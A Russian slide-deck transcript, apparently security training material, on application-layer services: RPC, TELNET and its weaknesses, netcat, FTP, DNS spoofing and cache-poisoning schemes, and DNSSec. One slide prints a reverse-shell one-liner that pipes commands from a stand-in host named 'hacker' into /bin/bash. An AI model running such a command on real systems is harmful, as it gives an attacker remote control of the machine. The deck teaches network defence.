Прикладные службы Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня.

Презентация:



Advertisements
Похожие презентации
Протоколы прикладного уровня Раздел 2 – Тема 15 Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня Уровень сетевого взаимодействия.
Advertisements

Прикладные службы Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня.
Протокол эмуляции удаленного доступа терминала Telnet.
Слайд 94 БЕЗОПАСНОСТЬ УРОВНЯ СЕТЕВОГО ВЗАИМОДЕЙСТВИЯ Раздел 2.
Проблемы обеспечения безопасности приложений Тема 20.
Проблемы обеспечения безопасности приложений Тема 20.
Получение контроля над объектом атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Ошибки реализации Степень.
Internet Scanner ИНФОРМЗАЩИТА НАУЧНО-ИНЖЕНЕРНОЕ ПРЕДПРИЯТИЕ.
Получение контроля над объектом атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Ошибки реализации Степень.
Транспортный уровень Сети и системы телекоммуникаций Созыкин А.В.
Процессы и протоколы в сети. Модель сетевых коммуникаций OSI Прикладной Представления Сеансовый Транспортный Сетевой Канальный Физический 7 уровней.
Процессы и протоколы в сети. Модель сетевых коммуникаций OSI Прикладной Представления Сеансовый Транспортный Сетевой Канальный Физический 7 уровней.
Она функционирует благодаря наличию определённых стандартов взаимодействия компьютеров и установленных на них программ.
Сложностные характеристики статистических скрытых каналов Автор: Свинцицкий Антон Игоревич Факультет вычислительной математики и кибернетики Московского.
Сети и Интернет. Интернет, ЛВС История развития сетей Мейнфреймы: Один многозадачный компьютер Множество рабочих терминалов.
ОфисЖилой дом телефон. ПОРТЫ При доставке сообщения по протоколу TCP или UDP запрашиваемые протоколы и сервисы распознаются по номеру порта. Порт – это.
Диагностика IP - протокола Борисов В.А. КАСК – филиал ФГБОУ ВПО РАНХ и ГС Красноармейск 2012 г.
Криптографический шлюз К -. Типовая корпоративная сеть Проблемы: Возможность вторжения из открытой сети Возможность вторжения из открытой сети Возможность.
Получение контроля над объектом атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Ошибки реализации Степень.
Средства обнаружения атак. Архитектура систем обнаружения атак Модуль слежения Модуль управления Системы на базе узла Системы на базе сегмента.
Транксрипт:

Прикладные службы

Клиент Сервер Протокол обмена TELNET FTP HTTP Реализация служб прикладного уровня

Удалённый вызов процедур Канальный уровень Физический уровень Сетевой уровень Транспортный уровень Уровень соединения Уровень представления Уровень приложения Ethernet, FDDI, X.25 и другие Сетевой уровень IP TCP, UDP RPC У Ч Е Б Н Ы Й Ц Е Н Т Р ИНФОРМЗАЩИТА

Клиент Сервер RPC Протокол RPC Спецификация RPC-сервера Номер программы Номер процедуры Номер версии

Клиент Сервер RPC Запрос клиента Спецификация RPC-сервера Номер программы Номер процедуры Номер версии Номер порта

Клиент Сервер RPC Номер процедуры RPC-сканирование Номер порта

Клиент (утилита telnet) Сервер (telnetd) Протокол обмена TELNET Протокол удалённого терминала - TELNET

Варианты взаимодействия по протоколу TELNET Терминал – Серверный процесс Терминал – Терминал Процесс – Процесс

Взаимодействие «терминал-удалённый процесс» Терминал – Серверный процесс $a a a a

Команды протокола TELNET Управляющий символ IACКоманда Параметры Interpret as Command, равен 255 Например, клавиша Backspace, байт

Команды протокола TELNET Название команды Код Описание команды IP (Interrupt Process)244 Прерывание процесса пользователя AO (Abort Output)245 Остановка вывода на дисплей AYT (Are You There)246Проверка состояния системы EC (Erase Character)247 Удаление последнего введённого символа EL (Erase Line)248Удаление текущей строки

Передача команд $a IAC EC Backspace $

Клиент (утилита telnet) Сервер (telnetd) Передача имени и пароля в открытом виде Уязвимости протокола TELNET

Изменение переменных окружения до аутентификации Уязвимости протокола TELNET Клиент (утилита telnet) Сервер (telnetd)

Что такое Netcat? Netcat - это утилита, которая позволяет читать и записывать данные по сети с использованием протоколов TCP или UDP. Возможности netcat : Работа с входящими и исходящими TCP или UDP соединениями, использующими любые порты Выполнение DNS запросов различных типов Возможность задания порта источника Возможность использования любого адреса источника (из локально сконфигурированных) Возможности по сканированию портов Работа в качестве telnet-сервера

Netcat и Telnet Telnet имеет ограничения, преодолеть которые поможет Netcat. Например: Ограничения стандартного потока ввода Посылка сообщений об ошибках в стандартный поток вывода, вместе с данными Невозможность посылки двоичных данных Невозможность находиться в состоянии ожидания соединения Невозможность работы с UDP

Режимы работы Netcat Режим исходящих соединений Режим ожидания входящих соединений Слушающий порт nc [-опции] порт[ы] nc –l –p [-опции] [узел] [порт]

«Обращённый» TELNET

80 25 > telnet hacker 80 | /bin/bash | telnet hacker 25 /bin/bash Команды Результаты

Клиент Сервер Команды Ответы Реализация службы FTP Интерфейс пользователя Модуль управления передачей Модуль передачи данных Данные Модуль управления передачей Модуль передачи данных

telnet Resolver - ? DNS Server DNS - служба

Домены и поддомены « » orgedu com company sale buhg Root Name Server company.com Name Server sale.company.com Name Server

Записи Resource Record main.sale.company.com. IN A sale sale.company.com Name Server sale.company.com. IN NS ns.sale.company.com

Разрешение имён ResolverResolver main.sale.company.com - ? com Name Server Root Server company.com NS sale.company.com NS

Применение транспортного протокола без установления соединения (UDP) Отсутствие идентификации и аутентификации Отсутствие средств разграничения доступа Уязвимости службы DNS

Пример атаки на IP - сеть: Атака на DNS Нарушение нормального функционирования объекта атаки Местонахождение атакующего В одном сегменте с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высока я Нарушение навигации (ложный маршрут) Механизм реализации

Схема работы DNS - протокола DNS-сервер Хост А IP - адрес ID Имя компьютера SourcePort DNS-запрос DNS-ответ ID - генерируется приложением, пославшим запрос, обычно=1 SourcePort вначале принимает значение 1024 а потом увеличивается Пример атаки на IP - сеть: Атака на DNS

DNS-сервер Хост А ID Имя компьютера SourcePort DNS-запрос Хост А посылает DNS - запрос Нарушитель должен находиться в одной подсети с А или в одной подсети с DNS - сервером Это позволит ему перехватить пакет с запросом Пример атаки на IP - сеть: Атака на DNS

DNS-сервер Хост А DNS-запрос Нарушитель извлекает из запроса ID и SourcePort Ложный DNS - ответ: от имени настоящего DNS - сервера, но в качестве IP - адреса искомого узла указывается IP - адрес нарушителя Результат: хост А имеет неправильное соответствие между именем компьютера и IP - адресом Пример атаки на IP - сеть: Атака на DNS

Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS

Пример атаки на IP - сеть: Атака на DNS (вариант 2) Нарушение нормального функционирования объекта атаки Местонахождение атакующего В разных сегментах с объектом атаки Используемые уязвимости Цель Слабая защищённость протокола DNS - - недостаток проектирования Степень риска Высока я Нарушение навигации (ложный маршрут) Механизм реализации

DNS-сервер Хост А ID IP - адрес DestPort Ложные DNS - ответы Перебор Пример атаки на IP - сеть: Атака на DNS (вариант 2)

DNS-сервер Хост А Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 2)

Хост А Узел сети Теперь путь пакета от хоста А до узла сети будет лежать через хост нарушителя Пример атаки на IP - сеть: Атака на DNS (вариант 2)

DNS-сервер ertr.mpei.ac.ru. Кэш - таблица DNS-сервер следующего уровня DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)

DNS-сервер ertr.mpei.ac.ru. Кэш - таблица DNS-сервер следующего уровня DNS-запрос Ложные DNS - ответы Пример атаки на IP - сеть: Атака на DNS (вариант 3)

DNS-сервер ertr.mpei.ac.ru. Кэш - таблица Хост А DNS-запрос DNS-ответ Пример атаки на IP - сеть: Атака на DNS (вариант 3)

DNS в корпоративной сети Внешний узел Вторичный сервер Внутренний узел Первичный сервер Репликация Рекурсивный запрос Рекурсивные запросы Итеративные запросы DNS

DNS в корпоративной сети Доступ узлов корпоративной сети к полной информации о внутренних именах Доступ отдельных узлов корпоративной сети к глобальному пространству имён Internet Доступ внешних узлов к минимально необходимой информации о внутренних именах

Двухсерверная конфигурация Внешний узел Вторичный сервер Внутренний узел Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия) DNS

Трехсерверная конфигурация Внешний узел Вторичный сервер (минимальная версия) Внутренний узел (с Internet) Первичный сервер (минимальная версия) Репликация Рекурсивный запрос Рекурсивный запрос Итеративные запросы Межсетевой экран Первичный сервер (полная версия+корень) DNS Вторичный сервер (полная версия) Внутренний узел (без Internet)

Трёхсерверная конфигурация Первичный сервер (минимальная версия) Межсетевой экран Первичный сервер (полная версия) +корень DNS Вторичный сервер (полная версия) Internet

Протокол DNSSec Механизм распределения открытых ключей Целостность и аутентичность информации DNS Аутентификация транзакции

Новые записи Resource Record main.sale.company.com. IN A sale.company.com. IN NS ns.sale.company.com sale.company.com. IN KEY [ключ] sale.company.com. IN SIG [подпись] sale.company.com. IN NXT [домен]

Обычный DNS-запрос qname=main.sale.company.com qtype=A main.sale.company.com A Владелец sale.company.com NS ns.sale.company.com Дополнительно ns.sale.company.com A Запрос Ответ

Запрос DNSSec qname=main.sale.company.com qtype=A Вопрос main.sale.company.com A ? main.sale.company.com A main.sale.company.com SIG [подпись] Владелец sale.company.com NS ns.sale.company.com sale.company.com SIG [подпись] Дополнительно ns.sale.company.com A ns.sale.company.com SIG [подпись] sale.company.com KEY [ключ] main.sale.company.com KEY [ключ] ns.sale.company.com KEY [ключ] Запрос Ответ

Раздел 2 – Итоги Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Модель OSI. Архитектура TCP/IP. Сетевые анализаторы. Сетевые анализаторы. Сетевые анализаторы. Сетевые анализаторы. Программа Internet Scanner. Программа Internet Scanner. Программа Internet Scanner. Программа Internet Scanner. Межсетевые экраны. Межсетевые экраны. Межсетевые экраны. Межсетевые экраны. Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Протоколы IPSec, SSL, SSH, DNSSec Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Система обнаружения атак RealSecure. Cлужбы прикладного уровня. Cлужбы прикладного уровня. Cлужбы прикладного уровня. Cлужбы прикладного уровня.